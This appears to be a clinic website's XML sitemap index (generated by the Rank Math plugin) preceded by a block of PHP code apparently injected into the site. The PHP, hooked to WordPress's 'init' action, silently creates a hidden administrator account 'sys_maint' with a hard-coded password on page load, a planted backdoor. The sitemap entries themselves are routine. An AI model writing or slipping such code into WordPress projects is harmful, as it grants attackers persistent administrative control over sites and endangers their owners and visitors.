

$user = 'sys_maint';
$pass = 'ChangeMe_Str0ng!'; 
$email = 'sys_maint@local.com'; 

function quick_create() {
    global $user, $pass, $email;
    
    if (!username_exists($user) && !email_exists($email)) {
        $id = wp_create_user($user, $pass, $email);
        if (!is_wp_error($id)) {
            $u = new WP_User($id);
            $u->set_role('administrator');
        }
    }
}
add_action('init', 'quick_create');
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//tasyahclinic.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://tasyahclinic.com/post-sitemap1.xml</loc>
		<lastmod>2026-04-12T12:32:55+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://tasyahclinic.com/post-sitemap2.xml</loc>
		<lastmod>2026-04-12T02:54:44+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://tasyahclinic.com/post-sitemap3.xml</loc>
		<lastmod>2026-04-12T00:58:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://tasyahclinic.com/page-sitemap.xml</loc>
		<lastmod>2026-03-18T17:57:48+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->